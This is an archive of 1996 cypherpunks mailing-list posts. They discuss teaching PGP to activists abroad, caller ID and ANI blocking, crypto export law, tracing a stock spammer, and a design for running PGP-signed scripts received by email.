Did you let that stop you in the past? Suppose the course were conducted
from outside the US? The packages can in any case be downloaded legally from
outside. I'm sure there is no law against your telling me how to use a
particular software package? Anonymously, if you must?

What I have  in mind is as follows: 

"Building a Cryptobook" lists a number of software packages:

SecureDrive
PGP
Private Idaho
PGPfone
Wipe Utilities
S-Tools

Joel provides also the configuration steps needed to get it all working,
which is an excellent starting point. Suppose we do an e-mail course telling
people in simple language *why* they need this, what benefits they would get
as a result, how to download (idiot-proof instructions all through), and how
to set up *for basic, minimum security*. I'm sure the software packages will
have all sorts of bells and whistles that the novice doesn't need, not right
away. Maybe some or all of this instructional material is already available.
Could we pick up a set that is easy to understand and concise? That could be
packaged together as a course or a book, a sort-of "Crypto for Dummies."
Would people like to select individual software packages, and put the
material together? Everyone gets due credit, of course.

Think for a moment: Just as Nelson Mandela stood today at the corner of
Trafalgar Square in front of South Africa House, where I'm sure many of us
have shouted ,"Free Nelson Mandela!", some day soon we might get similar
thanks from some Chinese or heavens knows whom...

>From: Alan Olsen <alano@teleport.com>
>Another thing to do is get more web sites containing information of interest
>to people living in such regimes on SSL enabled web servers. 

This, and the encrypted fax would help greatly. I'm sure others have good
ideas too. Please send them. How does one go about facilitiating their
implementation?
Arun Mehta Phone +91-11-6841172, 6849103 amehta@cpsr.org
http://mahavir.doe.ernet.in/~pinaward/arun.htm
The protestors of Tiananmen Square will be back. Next time, 
the battle will be fought in cyberspace, where the students 
have the more powerful tanks...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Sat, 13 Jul 1996 17:45:03 +0800
To: Arun Mehta <amehta@giasdl01.vsnl.net.in>
Subject: Crypto-activism
Message-ID: <199607130500.BAA15914@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On 13 Jul 96 at 0:37, Arun Mehta wrote:
[..]
> >> 1) Collect the e-mail addresses as Allen suggested (including those in
> >> Hongkong), and send them a single, short message offering to teach them free
> >> of cost how to use pgp and all the goodies at
> >> http://www.eskimo.com/~joelm/cbsw.html
> >
> >Might be condescending.  'Civilized white man brings PGP to the 
> >barbarians...' 
> 
> Look around you: while "civilized", "white" and "man" might characterize the
> vast (?) majority on this list, I'm sure that's not the universe on
> cypherpunks. And how does it matter? I'm suggesting an e-mail course that

My point is that a lot of people in those countries are aware of PGP 
etc. than make it out to be.  Certainly many activists are.  They 
focus on the human rights issues at hand, to which PGP etc. may be a 
tool... but isn't the central focus.

It would be condescending to email to many people in a domain saying 
"hey, have you heard of PGP?..."  Chances are they'll think it's a 
strange commercial spam anyway.

The "civilized white man" comment was more of a metaphor.  Change 
that to "Cypherpunks bring gifts of crypto to the natives" or maybe 
"Cypherpunks civilized the barbarians with PGP"...

[..]
> > They may well know about PGP, but not in a position 
> >to make that knowledge widely known.
> 
> That's no good to the rest of the world. Forget them: the question is,  are
> *you* in a position to share your knowledge?

Yep.  But there's a proper way to share knowledge.  You don't want to 
do it in such a way as to get the person you're sharing it with in 
trouble (esp. for something like crypto, where you could go to jail 
or be shot in some jurisdictions).  If that person isn't interested, 
there's not much you can do... you may end up turning someone off.  
If you want someone to listen, and be interested (if they're not 
already), you have to do it in an appropriate way.

You also have to know what you're talking about: if you're not familiar
with the nitty -gritty of politics in such countries, you'll come off as the 
"cypherpunk bearing gifts of crypto for the natives"... the politics 
going on in places like Cuba, China, Iraq, Russia are a bit more 
complex than what comes off through the media (to some extent no 
matter where you are and what media you watch).

For example... there are many anti-Castro 'democratic' socialists in Cuba.
If you approach them as if they were anti-Communists you'll be seen 
as a clueless kook.  Some Chinese I have spoken to are suspicious of 
the Tiennamen Sq. activists, claiming they were more 'reformists' 
than true democratizers who were unknown before Tiennamen. Many 
Iranians will insist Iran is a democratic country where 
fundamentalists hold a lot of popular power, and that Western 
tinkering will only strengthen fundamentalists rather than allow a 
transition to a more moderate party.

I'm not saying any of these are true... they are just examples of how 
people in the respective territories view their situations 
differently, and that one can do more harm mistaking the situations 
in those countries.

One more important issue: people have to trust you.  You can't go 
into a strange environment and expect trust if you come off as a 
tourist.

As for sharing knowledge... share crypto with activists involved with 
other issues.  If one right, they're likely to use it in ways one 
hasn't imagined.

[..]
> >I'd leave the specifics to activists who are already familiar with 
> >the respective cultures, societies, politics, etc.... 
> 
> I'm one. Be glad to tell you more,...

Yes, do tell.

[..]
> It's only crypto, not the Bible or Koran. And let them be their own judges?
> You seem to want to protect people in the Third World the way the US
> government wants to keep cyberporn from kids.

No. I don't want to see somebody do something annoying and 
counterproductive that can get people it's allegedly meant to help in 
trouble and perhaps make a case for strengthening crypto regulations.

Rob
 
---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sat, 13 Jul 1996 21:09:06 +0800
To: cypherpunks@toad.com
Subject: SEARCH> Social Security Death Index Search (fwd)
Message-ID: <199607130826.BAA10680@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


---------- Forwarded message ----------
Date: Fri, 5 Jul 1996 12:41:15 -0300 (ADT)
From: Todd Smith <tsmith@admin.fsu.edu>
To: Multiple recipients of list <inet-news@nstn.ca>
Subject: SEARCH> Social Security Death Index Search

     Social Security Death Index Search

     http://www.infobases.com/ssdi/query01.htm

     To search the Social Security Death Master File (a.k.a. Social
     Security Death Index or simply SSDI), fill
     in any or all of the fields below and press "Submit."

     A list of some Social Security Death Index information is available
     here.

     The SSDI search indexes are currently under development.
     Indexs are currently available for surnames beginning with the
     following letters:

     A B C D E . . . I J . . M N O P Q R . . U V . X Y Z

     Last Name:
     First Name:
     SSN:
     Location Issued:

     Birth Information
       Date:
       Month:
       Year:

     Death Information
       Date:
       Month:
       Year:

     Last Residence / Lump Sum Payment Information:
       City:
       County:
       State:
       Zip Code:

------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: William Knowles <erehwon@c2.org>
Date: Sat, 13 Jul 1996 21:23:27 +0800
To: cypherpunks@toad.com
Subject: Re: Crypto-Activism & PGP
Message-ID: <Pine.SUN.3.94.960713015253.2391A-100000@infinity.c2.net>
MIME-Version: 1.0
Content-Type: text/plain


Does anyone know how many languages PGP's help files and
documentation has been translated into?

A good start I would think would be translating PGP into Chinese?
and mirroring it on sites around the world.

William Knowles
erehwon@c2.org


--
William Knowles    <erehwon@c2.org>
PGP mail welcome & prefered / KeyID 1024/2C34BCF9
PGP Fingerprint 55 0C 78 3C C9 C4 44 DE   5A 3C B4 60 9C 00 FB BD
Finger for public key
--






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@sendai.scytale.com (Roy M. Silvernail)
Date: Sat, 13 Jul 1996 20:04:40 +0800
To: ericm@lne.com (Eric Murray)
Subject: Re: Can't block caller ID in Massachusetts?
In-Reply-To: <199607121854.LAA29560@slack.lne.com>
Message-ID: <960713.020337.6k8.rnr.w165w@sendai.scytale.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

In list.cypherpunks, ericm@lne.com writes:

> When I called the Pac Bell customer service droids to get my "complete"
> blocking I asked them why they won't block CID to 800 numbers.
> Their answer: "that's just the way it works". 

A little simplistic, perhaps, but nevertheless accurate.  800 and 900
numbers do not receive CNID (Calling Number ID).  They receive ANI
(Automatic Number Identification).  In the case of 800 (or 888) numbers,
they're paying for the call.  For 900's, you're paying a premium charge.
In both cases, the calling number is delivered for billing purposes.
This isn't new... ANI has been around for years.

> Caller ID isn't for people, it's for businesses who want to
> track callers.

Speak for yourself.  I have CNID, and I find it to be damn useful in
deciding which calls go to voicemail.
- -- 
           Roy M. Silvernail     [ ]      roy@scytale.com
PGP Public Key fingerprint =  31 86 EC B9 DB 76 A7 54  13 0B 6A 6B CC 09 18 B6
                Key available from pubkey@scytale.com

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMedLNxvikii9febJAQGTOAP9Ffsbp51yUz6aunjmmLdDXbHb83g4rlBY
8oRyz7oSJyqOQAyXYpUVH3yQCMCRZGsrH8gxacpJjYVIHvLSq7vYEYyiP5IDz3n1
Zfc74odlZplI3McDtglWhcg1IJ1Rcp+6WH+Ayel3onLLEUMSSuBXHmml9+QdI8B2
vViJsmxDByo=
=Sh7x
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Elliot Lee <sopwith@redhat.com>
Date: Sat, 13 Jul 1996 18:54:00 +0800
To: chag@moneyworld.com
Subject: Re: Chancellor Group (symbol = CHAG)
In-Reply-To: <199607120153.SAA16483@toad.com>
Message-ID: <Pine.LNX.3.93.960713015840.14684C-100000@redhat.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 11 Jul 1996 chag@moneyworld.com wrote:

> http://chancellor.stockpick.com
> 
> Chancellor Group, Inc. (symbol CHAG) just reported big quarterly earnings.
> SGA Goldstar issued a "buy" recommendation.  I understand other investment
> advisors are looking to recommend CHAG. The company has a strong book value.
> The short sellers need to cover.  This looks like a good situation to me.
> What do you think?  They are located at:
> 
> 	http://chancellor.stockpick.com
> 
> Bob Williams, 206-269-0846 
> 
> To terminate from my Investment Opportunities, Reply to 
> chag@moneyworld.com with "remove" in the subject field. 

Ugghhh!

This guy's gotta get stopped somehow. Is there an Anti-SPAM list that
would be more appropriate for this?
---------------------------------------------------------------------

'whois moneyworld.com'
registered to Bob Williams <dyno@cyberspace.com>
No hosts seem to be active in the moneyworld.com domain except
usa1.moneyworld.com [208.129.19.69]  - even the name server is dead. us1
is an outgoing-only SMTP server AFAIK - can't connect to port 25, but the
spam came from that host most likely.

'whois stockpick.com'
registered to Bob Williams <dyno@cyberspace.com>

'finger dyno@cyberspace.com'
[cyberspace.com]
Account Name:  Peter Johnson
Email address: dyno@cyberspace.com

'lynx http://www.cyberspace.com/~dyno/'
Shows directories for chag, netamerica, and natureplus.
chag has the (phony) investment reports.
natureplus shows a bunch of stuff trying to advertise holistic medicine
("Herbs, Minerals, Vitamins & Extracts").

Lookie here - netamerica must be the name of his 'real' company. Has a
bunch of information, the title of the main page is "Direct Internet
Marketing & Financial Public Relations"

Going to the chancellor.stockpick.com pages says that the name of the
company, however, is 'Financial Connections, Inc.'

Looks like this guy is:
	- Going under a fake name/names
	- Advertising by abusing the Internet
	- Using as many company names as he has pairs of underwear






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Carpenter <mcarpent@Dusk.obscure.net>
Date: Sat, 13 Jul 1996 21:31:11 +0800
To: cypherpunks@toad.com
Subject: Execution of signed scripts received by e-mail
Message-ID: <199607130841.DAA00240@Dusk.obscure.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


This is a rough description of a perl script I'm working on to allow the
automated execution of PGP signed scripts received by e-mail.  I call it
emscrypt.

Right now it is in the volatile-ware stage.  Hopefully I'll have it tested
enough to post here shortly, if I feel i can pull myself away from my
research for a few hours.  But I thought I would post a description now to
see if anyone can find any problems with the way I'm going about this or has
any suggestions.

I apologize for the possibly inscrutable descriptions; it's been a while
since I last slept.  Let me know if anything needs clarification.


First, a basic description of the idea:

1. Write a script (perl, sh, etc.) to be executed on a remote machine.
2. Sign the script with PGP.  It can also be encrypted using the public key
   for the emscrypt installation on the remote machine.
3. Mail the signed/encrypted script (a.k.a. emscrypted mail) to the
   address where emscrypt is installed.
4. The script is received and piped to emscrypt (using procmail or
   something similar).
5. Emscrypt checks the PGP signature on the message, and checks for replay
   attacks based on the time stamp from the signature.
6. Emscrypt executes the script, gets the results, encrypts them, and sends
   them back to you.


The install procedure:

Create a directory to hold the PGP keyrings and the emscript temporary files.

Generate a secret/public key pair for the emscrypt software and place in the
emscrypt directory.  These need to be DIFFERENT for each installation of
emscrypt.  Otherwise you are subject to a "same play" attack.  I suppose you
could create two or more installations with the same key if you will ALWAYS
be sending all the same scripts to every installation.

Generate a public keyring in the emscrypt directory which has only the keys
with which you want to be able to validate incoming scripts.  Make them
"trusted" by the emscrypt key.

Update the PGPPASS, PGPPATH, and emscryptPath variables in the emscrypt
script.  This is very important since if the PGPPATH is pointing to your
normal pubring ANYONE with a key in that ring would be able to run scripts
on your system.  Actually only the keys which are "trusted", but there may be
lots of "trusted" keys which you wouldn't trust to run arbitrary scripts on
your computer. 

Test the script to make sure it seems to work alright on your system.  After
that, you can set it up to be automatically called when you receive e-mail
with the magic subject line of your choosing (or in some other way I
suppose).  I've been using something resembling the following procmail
recipe:

:0:
* ^Subject.*SQUEAMISH OSSIFRAGE
|/MY_PATH/emscrypt



How emscrypt works:


* Get input

Get one input line at a time, and look for Reply-To: and From:  headers to
get a reply address.  As we are slurping up lines, watch for '-----BEGIN
PGP' lines.  If it is for encryption or a signed message (i.e. as long as it
is not for a key block), get all the lines up to and including the
appropriate '-----END PGP' line, and save them to a temp file.

Note that several scripts can be batched together in a single input file.
Just generate the scripts and sign them separately and the combine all the
PGP messages into a single file.  Also, they may be signed with different
keys.


* Verify signature

Run PGP on the temp file to verify/decrypt it.  Save the stderr results from
the PGP process in another temporary file.  Get the verified(?)/decrypted
output from a pipe, and save in memory.  

(QUESTION: is it possible to have stderr redirected to a separate input pipe
and avoid writing to disk?  How?  (This is in Perl.)  I was combining the
the stderr and stdout from the PGP process into a single input pipe, but
that may allow for leakage of PGP stderr output into the script we are
verifying/decrypting if we aren't careful.)

Search through the PGP process stderr output to look for important stuff
like whether the signature was good, what the time stamp was, and what the
key user string is.  I'm not real happy with this method.  Probably doesn't
work well with versions other than 2.6.2 or non english language versions.
I'm waiting for the signature code and such in the PGP library from
Systemics (an announcement showed up here a couple days ago,
http://www.systemics.com/software/ ) which will allow this to be much
cleaner.

(QUESTION: Any other ideas for handling this?)


* Check for replay

If the signature is good then we need to check for the dreaded replay
attack.  This is how I have it working:  there is a separate file for each
PGP public key which keeps track of the time stamp for the last executed
script which was signed by that key.  Right now the file names are generated
from the key ID string for the pgp key.  Mainly because we get that for free
when we check the signature.  Will probably run 'pgp -kv "ID string"' so
that I can get the hex key ID, since that would probably make a more
reasonable file name.

Besides the value saved to disk, we store a separate time stamp for this
"batch" of messages in an associative array by key ID.  Each separate mail
message is a batch, but we may have more than a single PGP signed script in
each message.  So the batch time stamp is the stamp we read from a time
stamp file for a key ID when we process the first message in a batch for
that specific key ID.  The batch time stamp is then constant for the
remainder of this run of the script.

Anyway, we generate a file name based on the key ID, save it in an
associative array by key ID for later use, and see if the file actually
exists.

If the file doesn't exist, create it and save the time stamp from the current
signature to the file.  Put a timestamp of 100000000000 in an associative
array by key ID for later use (this is the batch time stamp: the time stamp
is formatted as YYYYMMDDHHmm.  I use 100000000000 here since I explicitly
check the time stamp format each time to make sure it is composed of exactly
12 digits.  Also, if the file doesn't exist, we need to use a batch time
stamp that will be lower than that of any of the messages in the current
batch for this key ID.  I suppose it might be better to generate a time
stamp something like (CURRENT_TIME - (some reasonable amount of time)) to
limit what is accepted.  I also plan to allow a limit for the amount of time
which can elapse between the script being signed and being received by
emscrypt for cases where the file does exist. 

If the file did exist on disk, read the time stamp from the file and save in
the batch time stamp associative array by key ID.

So now we have a replay prevention time stamp to compare to the time stamp
from this PGP signed script.  If the script stamp is more recent, then we can
execute the script.  But first, check to see if the script stamp is more
recent then the stamp saved in the file.  If it is, then replace the file
time stamp with the script stamp, and update the associative array which
keeps track of these values (this is the "most recent stamp" array, not the
"batch stamp" array).

* Execute the script

Check the variable status to make sure that both the signature and time
stamp were acceptable. If not, then generate an appropriate error message
explaining why the script was rejected, include a copy of the script,
encrypt the message using the submitter's public key, and mail it back.
Then go back to the top of the loop to deal with the rest of the input.

If it everything checks out, then prepare a file to receive the stderr
output, save the script to a file, set the script to executable, and open
(execute) it as an input pipe.  Get the results from stdout.  Open the
stderr file, and get the stderr results.  Combine the stdout, stderr, and
the script (with separators so we can tell what is what), encrypt the whole
bundle with the submitter's public key and mail it off.  Repeat loop for
rest of input.


Problems?  Suggestions?  Let me know.


Thanks,

- --Matt

- --
mcarpent@mailhost.tcs.tulane.edu                   Finger for PGP public key.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMedc/SjtJAMyBnp9AQF83wf+J9P1Lmr8sca12R89LUYcFxRms1gJro/9
E5Ni1kqivWKYJ+JP9geP+k7VLWbq5miby8RMfKemuz77BuK9UIQG1pd6bGNjlSg9
O+XkiB5dbHX6+hZ23wPABzeuu6+3klLfNnzQEuNZ4/jxeNwFIIY3ifYglhWIPoeG
a3kpd2DXY1HVjO674TQNGBYn6bnDPi5wMzYSTxJLukKHBzlgaLt4nssv/8N2jhcg
XHWqEEvHc2lY0UvBk+wuqJHigzI03NzpFkh7mgF6ll5gEuG0qGgvLIKb+ir4vF1Q
k46mNHq03M+Vc5/loLjFfQzcuu24GdjlFY2pHEpHz7rhYG25ONJeDg==
=Lm22
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathon Blake <grafolog@netcom.com>
Date: Sat, 13 Jul 1996 17:34:44 +0800
To: Arun Mehta <amehta@giasdl01.vsnl.net.in>
Subject: Re: Destabilizing China's Government with Strong Crypto
In-Reply-To: <1.5.4.32.19960713003051.002f9dac@giasdl01.vsnl.net.in>
Message-ID: <Pine.SUN.3.94.960713041130.26693B-100000@netcom17>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 13 Jul 1996, Arun Mehta wrote:

> Look around you: while "civilized", "white" and "man" might characterize the
> cypherpunks. And how does it matter? I'm suggesting an e-mail course that

	I'm trying to get a "civilised white woman" to learn to use
	cryptography.  

	At least, I think she is is civilised -- she 
	paid for lunch for me one day.  She is female, though that
	doesn't preclude a previous sex-change operation, or two. 
	She has a pale skin, and blue eyes, and blond hair,
	but that doesn't mean she isn't Jewish, like Hitler's 
	Poster Child of the Aryan Race was.  Her eyes
	may have been colored by wearing colored contact lenses,
	and her hair may have been bleached.  I assume she is white,
	since she has a pale skin.   An official of the
	former regime in South Africa might well have been able
	to classify her as "Cape Colored", "Other Colored",
	"Griqua of Rehobath" or any of the 47 plus racial classifications
	that they used.  

	So no, it doesn't matter who reads it, or who writes it,
	distributes it, etc --- so long as it gets done.

	<< I don't know who is being quoted in the following line. >
> >chances are they are already doing things along those lines. 
> If they are, its only in pockets,  and they are doing an awful job of
> telling people about it if none of us has heard. The Internet is still very

	They might be doing things the way Brother Andrew did,
	in smuggling Bible behind the Iron Curtain.   Not telling
	the world at large, to protect the smugglers, untill after
	most of their team was arted/detained/granted "persona
	non gratis" status behind the Iron Curtain.  

> or the greatness of Kim Jong Il,  and in the process upload all you know
> about the scandal, untraceable to you. 

	ROTFLOL. 
	OTOH, it will get by pretty much any censor.  << These graphics
	are of our Most Beloved Leader.   This must be an honourable
	upright citizen.  And stenographed in them, is the weekly 
	edition of what "Most Beloved Leader" has done against 
	his population.  >> 

> What I have  in mind is as follows: 
> "Building a Cryptobook" lists a number of software packages:
> packaged together as a course or a book, a sort-of "Crypto for Dummies."

	Package it as book, if any government does clamp
	down on the distribution of it as an E-Mail course.
	Or publish a book as a supplement.  

        xan

        jonathon
        grafolog@netcom.com

	AOL coasters are unique, and colourful.  
		Collect the entire set. 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 14 Jul 1996 01:13:17 +0800
To: froomkin@law.miami.edu>
Subject: Re: Can the inevitability of Software privacy be used to   defeat the ITAR?
Message-ID: <199607131310.GAA14552@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:27 PM 7/12/96 -0700, Bill Frantz wrote:
>At  9:21 PM 7/12/96 -0400, Michael Froomkin wrote:
>>> could claim that MIT came very close to violating ITAR, but the same claim
>>
>>"The ITAR do not apply to books"
>
>I'm not sure the exact legalities apply here.  I think it is more like the
>mob pressuring business men for protection and punishing those who do not
>comply.


And that's what "our" government's coming to!  Does anybody still think that 
they're not going to deserve what they get?

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 14 Jul 1996 01:23:20 +0800
To: cypherpunks@toad.com
Subject: Re: CDT Policy Post 2.27 - No New News on Crypto:
Message-ID: <199607131310.GAA14557@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:23 PM 7/12/96 -0400, Bob Palacios wrote:
>-----------------------------------------------------------------------------
>    _____ _____ _______
>   / ____|  __ \__   __|   ____        ___               ____             __
>  | |    | |  | | | |     / __ \____  / (_)______  __   / __ \____  _____/ /_
>  | |    | |  | | | |    / /_/ / __ \/ / / ___/ / / /  / /_/ / __ \/ ___/ __/
>  | |____| |__| | | |   / ____/ /_/ / / / /__/ /_/ /  / ____/ /_/ (__  ) /_
>   \_____|_____/  |_|  /_/    \____/_/_/\___/\__, /  /_/    \____/____/\__/
>   The Center for Democracy and Technology  /____/     Volume 2, Number 27
>----------------------------------------------------------------------------
>      A briefing on public policy issues affecting civil liberties online
>----------------------------------------------------------------------------
> CDT POLICY POST Volume 2, Number 27                        July 12, 1996
>(1) NO NEW NEWS ON ENCRYPTION - VP GORE REITERATES SUPPORT FOR KEY ESCROW
>
>Despite the growing pressure from Congress, privacy advocates, the computer
>industry, and the public for the reform of US encryption policy, the
>Administration continues to embrace its Clipper III key-escrow encryption
>proposal.  

Bob, I think I'd feel a lot better about CDT if you'd explicitly withdraw 
any support for the Leahy encryption bill.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Sat, 13 Jul 1996 19:46:26 +0800
To: Brad Shantz <bshantz@nwlink.com>
Subject: Re: It's more than "White Punks on Dope"
In-Reply-To: <199607111437.HAA18788@montana.nwlink.com>
Message-ID: <Pine.LNX.3.91.960713065803.501A-100000@switch.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 11 Jul 1996, Brad Shantz wrote:

[Stuff skipped]
> 
> At my wife's school, they do not use Ritalin.  They have started using a 
> product called PhytoBears.   Don't laugh.  These are GummiBears made out of 
> all natural vegetable extracts.   One of those, "100% of all the vitamins 
> and minerals needed by the human body and mind in a day" kind of things.  
> Apparently, the kids who were on Ritalin are now getting on much better 
> with PhytoBears than they were with Ritalin.
>
 
I'm going to say this like my brother would...

"Just remember... Cyanide is all natural too."

'Nuff said.

also, it seems that most of the people here who are speaking against 
ritalin have _OBVIOUSLY_ never taken or been close friends with anybody 
who has take ritalin.  It's not that bad.  Really.

 --Deviant

[Appologies that this messages isn't signed, my biggest HD crashed today, 
and the version of Pine in Linux Slackware 3.0 doesn't support filters... 
future messages will be signed, as usual...]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Sun, 14 Jul 1996 03:53:48 +0800
To: "Bruce M." <bkmarsh@feist.com>
Subject: Re: Can't block caller ID in Massachusetts?
In-Reply-To: <Pine.BSI.3.91.960712234635.23525A-100000@wichita.fn.net>
Message-ID: <Pine.SUN.3.91.960713073643.20814A-100000@crl9.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Fri, 12 Jul 1996, on wrote:

> > Another way to defeat ANI or whatever is to call 800 numbers
> > by using a pre-paid calling card.

In response to which Bruce M. wrote:

> It would still be possible for the LD company to just pass
> through your information for ANI, although I wonder what
> percentage actually do.

Not being technically oriented, I may be venturing into deep
water here, but I don't think ANI "pass through" is likely at
all.  When you use a pre-paid calling card, TWO separate calls
and call set-ups are made, your call to the card company and
the card companies call to your ultimate destination.  While 
many (most?) card companies keep records of all calls placed,
there are some who keep no records at all.  Unless this
hypothetical "pass through" capability is somehow built into 
the the phone infrastructure and is transparent to the card 
companies, I seriously doubt the card companes would invest any
resources in doing such a "pass through."  After all, the same
information is available, albeit with a bit more work, from 
their operational logs if they even keep those.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Sun, 14 Jul 1996 04:21:26 +0800
To: mcarpent@mailhost.tcs.tulane.edu
Subject: Re:  Execution of signed scripts received by e-mail
Message-ID: <199607131520.IAA06868@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


That sounds very impressive!  The one problem I've run into with mail
filtering software is that each message asynchronously spawns a separate
filter process.  This can cause some conflicts with accessing disk files.
I haven't used procmail so I don't know if it has this problem.  But if
so you may need to be careful if there are any cases where two processes
could be accessing the same disk files.  For example, what if two copies
of an identical email message arrive at almost the same time, would your
dup detection work.

The other issue is the possibility of mail arriving out of order.  Looking
for increasing timestamps may cause spurious rejection of some messages.
On the other hand this is a difficult problem to handle in general so
probably the current solution is OK.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bruce M." <bkmarsh@feist.com>
Date: Sun, 14 Jul 1996 01:21:32 +0800
To: cypherpunks@toad.com
Subject: Re: Can't block caller ID in Massachusetts?
In-Reply-To: <Pine.SV4.3.91.960712191424.22163H-100000@larry.infi.net>
Message-ID: <Pine.BSI.3.91.960713082927.14968A-100000@wichita.fn.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 12 Jul 1996, Alan Horowitz wrote:

> > Caller ID isn't for people, it's for businesses who want to
> > track callers.  They're willing to pay for that service, enough
> 
>    Privacy isn't for parasites. It's for people who are willing to pay for
>    their own phone calls. 

    That is interesting as I don't recall ever being offered a choice of 
toll free or being billed when I dial an 800 number (sometimes the only 
number offered for a company).

                       ________________________________
                      [ Bruce M. - Feist Systems, Inc. ]
                       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
     "Official estimates show that more than 120 countries have or are 
      developing [information warfare] capabilities." -GAO/AIMD-96-84






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Sun, 14 Jul 1996 01:00:50 +0800
To: cypherpunks@toad.com (Cypherpunks)
Subject: Re: Chancellor Group (symbol = CHAG)
In-Reply-To: <Pine.LNX.3.93.960713015840.14684C-100000@redhat.com>
Message-ID: <199607131247.IAA15446@nrk.com>
MIME-Version: 1.0
Content-Type: text


> Ugghhh!
> 
> This guy's gotta get stopped somehow. Is there an Anti-SPAM list that
> would be more appropriate for this?

As I said, this is raw meat for the SEC. See their web page.
The more complaints, the better....

-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Will Rodger <rodger@interramp.com>
Date: Sun, 14 Jul 1996 01:55:57 +0800
To: jimbell@pacifier.com
Subject: Re: I@Week on crypto export loophole 6/24/96
Message-ID: <1.5.4.32.19960713135331.006867b4@pop3.interramp.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 01:03 PM 7/13/96 +0200, you wrote:
>Will Rodger wrote:
>> 
>>  The odds the US would go after a foreign company would seem pretty remote,
>> unless based in a country that strongly suppported US policy.
>
>Er, right ... Just like they don't go after the Swiss bankers who
>choose to have dealings with Columbians, or German businessmen who
>have dealings with Cubans ...
>
You're right. I should have be more specific: I was thinking the odds the US
could successfully prosecute a non-US citizen for violating those laws seems
pretty remote if that person was from a country not in agreement with US
crypto policy. "Go after" is a bit vague. Shame on me.
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMefTA0cByjT5n+LZAQFPIAgA1CePSpY1wJm8CCQEloxIZMQMXNuaOC3U
Un6JpPtIIDY8X/uSFP7wg8Mgbt+bKBNp1Ehgx6dPMavs8JnMTQWZGGuSDlIdc+5Y
41sTEA6ig6iIls3NqnnVz+0F6JTRF20gKCR1KH++7EdG/zJKJJN833N9NU4QP3od
vXQ8jkaNILWzawsh83d9ZngC3ublDFU9onDOx6XIJAoSFNUn39hN8198BCtixCSq
FzIDsR2cuiWe4k1PcrUAtKCOlqRxjNqrgc/sy5Gf56qIdjbgJ/rfvO9Rf6JVFZ3i
6dIqw37OEZZ89+pm5hWnjjRQUj2O3oFgO6psBdLkfXkYF6w9ryVbAw==
=+1IU
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Harry Hochheiser" <harry@tigger.jvnc.net>
Date: Sun, 14 Jul 1996 03:56:08 +0800
To: cypherpunks@toad.com
Subject: Re: ANNOUNCEMENT: PGPfone Beta 7 Now Available for Download
Message-ID: <199607131454.AA13554@tigger.jvnc.net>
MIME-Version: 1.0
Content-Type: text/plain


On 12 Jul 96 at 21:31, Arun Mehta wrote:

> At 23:38 10/07/96 -0700, Will Price wrote:
> >ANNOUNCEMENT: PGPfone Beta 7 Now Available for Download
> 
> Sorry if this has been discussed before (please point me in the
> right direction if that is the case), but VSNL, my government-owned
> ISP (which also has a monopoly on all international traffic) made me
> sign that I will not use my Internet connection for voice traffic.
> Is there any way they could find out if I were using PGPfone, or
